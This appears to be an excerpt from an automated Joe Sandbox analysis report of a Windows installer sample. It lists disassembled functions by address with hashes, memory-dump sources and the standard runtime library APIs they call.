                                      • Instruction ID: 5b6e9803475034fb61f2686e618c31c6bf3d0e9869bb94a7fb96a333a4d5554e
                                      • Opcode Fuzzy Hash: eb16ab2991c322ab825eb8aa06eb7d0ec145a81678f8d2ea9e766c99cb928e6a
                                      • Instruction Fuzzy Hash: 30F0A031A103609BCB22CB59D401F8973B8EB05BA9F114096E811AB640C2B0ED00C7D1
                                      Function 6CB7D425 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                      • Instruction ID: 6a7680fcdf9029db23be2f7dd3b67e765e45809ba5ac565a8b6162676dd16f7a
                                      • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                      • Instruction Fuzzy Hash: 1BE08C329122B8EBCB20CB98D904D8AF3FCEB45B44B1100A6F925D3640C270EE00CBE0
                                      Function 6CC3A700 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                      • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                      • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                      • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                      Function 6CBD1B50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                      • API String ID: 3519838083-609671
                                      • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                      • Instruction ID: 07f9fb416b7a431f16bbcabf6836f9cd3226b83705261e66461361655b940dc9
                                      • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                      • Instruction Fuzzy Hash: DDD1A271A0428ADFCF01CFA4D980BEEB7B5FF45328F194529E055A3A50DB70E949CB62
                                      Function 6CBFABB3 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 406COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: L$L'K$T'K$\'K$d'K$p'K$)K
                                      • API String ID: 3519838083-3887797823
                                      • Opcode ID: 47b27f50cc51f1a94238cd0256452db9f2d92a2e889979d702001e9d19a1f323
                                      • Instruction ID: 60ce1d15810092af7de5adb29b5e26756c3d3b24ad3def4aad0618462bd76846
                                      • Opcode Fuzzy Hash: 47b27f50cc51f1a94238cd0256452db9f2d92a2e889979d702001e9d19a1f323
                                      • Instruction Fuzzy Hash: 89028F709012899FDB15CF64C990ADDFBB5FF05308F5481AAD069A7B50DB30AA8ECF61
                                      Function 6CBE8B6F Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE8B74
                                        • Part of subcall function 6CBE8AC2: __EH_prolog.LIBCMT ref: 6CBE8AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: DJ$H K$L K$P K$T K$X K$\ K
                                      • API String ID: 3519838083-3148776506
                                      • Opcode ID: 1e695b17fc03ab30503818bc101f4fbde075140751d540bd7eda0f269636307e
                                      • Instruction ID: 465a5d535af890b2bb29c7672be6836c0737e675a430bf2147bc2d4732bea688
                                      • Opcode Fuzzy Hash: 1e695b17fc03ab30503818bc101f4fbde075140751d540bd7eda0f269636307e
                                      • Instruction Fuzzy Hash: 1E51C9309049C59BCF10EFA8C480AEEB376EF5A78CF10C52BC8655BB40D77A990AC751
                                      Function 6CBE6CB2 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 347COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $ $$ K$, K$.$o
                                      • API String ID: 3519838083-1786814033
                                      • Opcode ID: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                      • Instruction ID: 30d6b473b27b21bbedd8cece8c4688e287cee619e038b53bc0d637dea6840d79
                                      • Opcode Fuzzy Hash: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                      • Instruction Fuzzy Hash: B8D1B1319042ED8BCF11CFA8D4906EEBBB2FF0D748F244269C555A7A82C7715949CBA2
                                      Function 6CB6D1C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 6CB6D1F7
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6CB6D1FF
                                      • _ValidateLocalCookies.LIBCMT ref: 6CB6D288
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6CB6D2B3
                                      • _ValidateLocalCookies.LIBCMT ref: 6CB6D308
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 799af0fd9f7368780c13f01da0c7dfc048dbfd020aacaa3fc235e38ef245ced5
                                      • Instruction ID: c74e8ce7f52aed0a8d17dbc31f6e70d00ee793564b2bd7e41e67a0fdc1dda9d0
                                      • Opcode Fuzzy Hash: 799af0fd9f7368780c13f01da0c7dfc048dbfd020aacaa3fc235e38ef245ced5
                                      • Instruction Fuzzy Hash: 0641A534A01298ABCF11CF7AD880ADE7BB5EF45318F248155EC24ABF51D771DA06CBA1
                                      Function 6CB7A58A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: 204d58fc43b6573ea77ba8c6972230b889d161443e62fded2bea23288775365c
                                      • Instruction ID: 3dbc9d6a6f3ab732ada9b1921bbed814a101014c1674f8dea47982e7fe4864aa
                                      • Opcode Fuzzy Hash: 204d58fc43b6573ea77ba8c6972230b889d161443e62fded2bea23288775365c
                                      • Instruction Fuzzy Hash: 3221D571A06291EBDB719A29CC44A4A3BB8DB037B8F152620EC21B7680E670DD01CBF5
                                      Function 6CB7F5A1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,6CB7E7C0,?), ref: 6CB7F5E9
                                      • __fassign.LIBCMT ref: 6CB7F7C8
                                      • __fassign.LIBCMT ref: 6CB7F7E5
                                      • WriteFile.KERNEL32(?,6CB891A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB7F82D
                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CB7F86D
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB7F919
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                      • String ID:
                                      • API String ID: 4031098158-0
                                      • Opcode ID: 8d15b4e70b826121b2a8b2f9d9549a11d20ef4195bdd5a1e802310ad26d72f21
                                      • Instruction ID: ca1f11b026548761bd4aa71c93da6800a6dc5e4e8cef9347b9a801bcca947204
                                      • Opcode Fuzzy Hash: 8d15b4e70b826121b2a8b2f9d9549a11d20ef4195bdd5a1e802310ad26d72f21
                                      • Instruction Fuzzy Hash: 63D1CF71D052989FCF21CFA8C9909EDBBB5FF49314F24016AE865BB341D730AA46CB64
                                      Function 6CA32F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6CA32F95
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6CA32FAF
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA32FD0
                                      • __Getctype.LIBCPMT ref: 6CA33084
                                      • std::_Facet_Register.LIBCPMT ref: 6CA3309C
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA330B7
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                      • String ID:
                                      • API String ID: 1102183713-0
                                      • Opcode ID: 8724a961b42f6fb93dc26a994a5c50eeb975e6fcb38d7ee81a278d0d6e6e095f
                                      • Instruction ID: bba59642b2456c3daca69887ad0c7ecbfa6f4302ebe9c2368f472225772e68fe
                                      • Opcode Fuzzy Hash: 8724a961b42f6fb93dc26a994a5c50eeb975e6fcb38d7ee81a278d0d6e6e095f
                                      • Instruction Fuzzy Hash: B7416AB1E052688FDF00CF86C964BAEB7B0FF45714F084629D859ABB40D734A985CF90
                                      Function 6CBA7FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aulldiv$__aullrem
                                      • String ID:
                                      • API String ID: 2022606265-0
                                      • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                      • Instruction ID: 35b7e95ac0e919305c4dfc5f162d4b469f630344b19e59863b1375a429c07e79
                                      • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                      • Instruction Fuzzy Hash: 9C21C530545299FEDF208FD69C40DCF7A6DEB817A8F208226B56861990E2724D61D6A1
                                      Function 6CB890FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 6CB891CD
                                      • _free.LIBCMT ref: 6CB891F6
                                      • SetEndOfFile.KERNEL32(00000000,6CB87DDC,00000000,6CB7E7C0,?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000), ref: 6CB89228
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000,?,?,?,?,00000000,?), ref: 6CB89244
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFileLast
                                      • String ID: 8Q
                                      • API String ID: 1547350101-4022487301
                                      • Opcode ID: 8b3ede3235fe81f6125da9fe0af2a22162741a8e38ef2c6d8ece84d3119231ef
                                      • Instruction ID: 8ca4fee0b774dc842ccf661783cbbd29280355d03007020b9a15bba55141e48b
                                      • Opcode Fuzzy Hash: 8b3ede3235fe81f6125da9fe0af2a22162741a8e38ef2c6d8ece84d3119231ef
                                      • Instruction Fuzzy Hash: 3F41C432D46685AADF11AFA8CC44BCE3779EF45324F150514E834A7B90DB35C8498762
                                      Function 6CBF684E Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBF6853
                                        • Part of subcall function 6CBF65DF: __EH_prolog.LIBCMT ref: 6CBF65E4
                                        • Part of subcall function 6CBF6943: __EH_prolog.LIBCMT ref: 6CBF6948
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: ((K$<(K$L(K$\(K
                                      • API String ID: 3519838083-3238140439
                                      • Opcode ID: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                      • Instruction ID: a910ffd3002bcb40a6f8f7fdc5a490ca7ebc58e879106be0e7338f3e2545a9cc
                                      • Opcode Fuzzy Hash: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                      • Instruction Fuzzy Hash: 6E215CB0901B90CEC724DF6AC54469FFBF4EF54304F108A5F80A687B50DBB46A08CB65
                                      Function 6CB7281A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CB728A4,?,?,6CB72925,?,?,?), ref: 6CB7282F
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CB72842
                                      • FreeLibrary.KERNEL32(00000000,?,?,6CB728A4,?,?,6CB72925,?,?,?), ref: 6CB72865
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 7c84d91e5d512118d790869aee592ad0d9cd8193bc1caa484bb471a98e37d07a
                                      • Instruction ID: a31ef63dd1676a0adf7f1acc091bbf1e073d297ee0118ad57b1d677f5ff8149d
                                      • Opcode Fuzzy Hash: 7c84d91e5d512118d790869aee592ad0d9cd8193bc1caa484bb471a98e37d07a
                                      • Instruction Fuzzy Hash: 2EF08C30611158FBDF119F92CE0DB9EBBB8EF0236AF114074A811B2560DF718A01DBA2
                                      Function 6CB6AA17 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 6CB6AA1E
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6CB6AA29
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB6AA97
                                        • Part of subcall function 6CB6A920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CB6A938
                                      • std::locale::_Setgloballocale.LIBCPMT ref: 6CB6AA44
                                      • _Yarn.LIBCPMT ref: 6CB6AA5A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                      • String ID:
                                      • API String ID: 1088826258-0
                                      • Opcode ID: b7eed6536ca92216f242936b1f857e17eab6c2585158e7fd31753119f895b775
                                      • Instruction ID: 7f3d78da772cdcd59a9455271a1a13e32863704e261f74f9903197f94ea76c16
                                      • Opcode Fuzzy Hash: b7eed6536ca92216f242936b1f857e17eab6c2585158e7fd31753119f895b775
                                      • Instruction Fuzzy Hash: B1015679A012A19FDF06DF22CA50ABD7BB1FB85354B190449D9125BB80CF34AA06EF81
                                      Function 6CBE9E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $!$@
                                      • API String ID: 3519838083-2517134481
                                      • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                      • Instruction ID: 71301c6d1b29353031536ecee6d17e3ed433f46569adc3af8539dbd6d94bf667
                                      • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                      • Instruction Fuzzy Hash: 52126734D05289DFCB04CFA4C490ADEBBB9FF09B88F148069E445ABB51DB35A949CF61
                                      Function 6CBB5B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog__aulldiv
                                      • String ID: $SJ
                                      • API String ID: 4125985754-3948962906
                                      • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                      • Instruction ID: da0286960010855e3ec5b3432eeedc84bde798e14d14d48fce72b8e3271bcb39
                                      • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                      • Instruction Fuzzy Hash: CBB14FB1D002599FCB14CF95C8809AEBBB5FF48314F60862ED459B7B50DB30AA49CF56
                                      Function 6CA32020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 6CB6AA17: __EH_prolog3.LIBCMT ref: 6CB6AA1E
                                        • Part of subcall function 6CB6AA17: std::_Lockit::_Lockit.LIBCPMT ref: 6CB6AA29
                                        • Part of subcall function 6CB6AA17: std::locale::_Setgloballocale.LIBCPMT ref: 6CB6AA44
                                        • Part of subcall function 6CB6AA17: _Yarn.LIBCPMT ref: 6CB6AA5A
                                        • Part of subcall function 6CB6AA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB6AA97
                                        • Part of subcall function 6CA32F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CA32F95
                                        • Part of subcall function 6CA32F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CA32FAF
                                        • Part of subcall function 6CA32F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA32FD0
                                        • Part of subcall function 6CA32F60: __Getctype.LIBCPMT ref: 6CA33084
                                        • Part of subcall function 6CA32F60: std::_Facet_Register.LIBCPMT ref: 6CA3309C
